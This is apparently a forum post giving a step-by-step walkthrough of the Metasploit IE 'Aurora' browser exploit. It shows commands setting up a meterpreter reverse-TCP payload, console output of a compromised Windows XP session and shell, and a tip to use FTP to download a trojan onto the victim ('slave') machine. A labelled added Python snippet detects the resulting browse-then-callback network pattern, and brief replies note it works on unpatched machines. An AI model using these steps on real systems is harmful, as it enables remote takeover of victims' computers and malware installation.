First, you must download Metasploit.
Code:
http://www.metasploit.com/releases/framework-3.3.3.exe
(Windows OS)
After downloading and installing it, run Metasploit Update and wait until the update completes.
Then run the Metasploit Console.
Then do the following (the text after each prompt is what you must type):
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
[ Remember: CMD is the most useful control on Win32. You can use the FTP command to download a trojan onto the slave PC and run it. ]
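From the defender's side, the session above leaves a recognizable network pattern: the workstation fetches a page from a host on a non-standard HTTP port (8080 here) and moments later opens a new non-HTTP connection to the same host on another port (4444 here). The following is an added example, not part of the original post, that correlates those two events in flow records; the record format, the sample lines, the 60-second window and the function names are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample flow records; addresses and ports mirror the console output above.
SAMPLE_FLOWS = """\
2010-01-20T10:15:02 192.168.0.166:1513 192.168.0.151:8080 http
2010-01-20T10:15:04 192.168.0.166:1514 192.168.0.151:4444 tcp
2010-01-20T10:16:30 192.168.0.170:2201 192.168.0.10:80 http
2010-01-20T10:20:00 192.168.0.170:2202 192.168.0.151:4444 tcp
"""
STANDARD_WEB_PORTS = {80, 443}
WINDOW = timedelta(seconds=60)  # assumed correlation window

def parse_flows(text):
    """Parse 'time src:port dst:port proto' lines into dicts, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
            src, _ = parts[1].rsplit(":", 1)
            dst, dport = parts[2].rsplit(":", 1)
            flows.append({"ts": ts, "src": src, "dst": dst,
                          "dport": int(dport), "proto": parts[3]})
        except ValueError:
            continue
    return sorted(flows, key=lambda f: f["ts"])

def find_browse_then_callback(flows, window=WINDOW):
    """Flag a client that browses to a host on a non-standard port and then
    opens a non-HTTP connection to the same host on a different port."""
    alerts = []
    recent_http = {}  # (client, server) -> (time, port) of last odd-port HTTP fetch
    for f in flows:
        key = (f["src"], f["dst"])
        if f["proto"] == "http":
            if f["dport"] not in STANDARD_WEB_PORTS:
                recent_http[key] = (f["ts"], f["dport"])
        elif key in recent_http:
            http_ts, http_port = recent_http[key]
            if f["dport"] != http_port and f["ts"] - http_ts <= window:
                alerts.append((f["src"], f["dst"], http_port, f["dport"]))
    return alerts

if __name__ == "__main__":
    for client, server, web, cb in find_browse_then_callback(parse_flows(SAMPLE_FLOWS)):
        print(f"ALERT {client}: HTTP to {server}:{web}, then TCP to {server}:{cb}")
```

The rule keys on the sequence of connections rather than on port 4444 itself, since the handler port is only the value shown in this session.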
..................................................................................................................................
Problem: after you created the shell, what can you do?
nvm, but does it still work, and is there any concept on how this works because I think this is really cool.
After you have created the shell you can execute any command on the remote computer. And it works if the other computer is unpatched.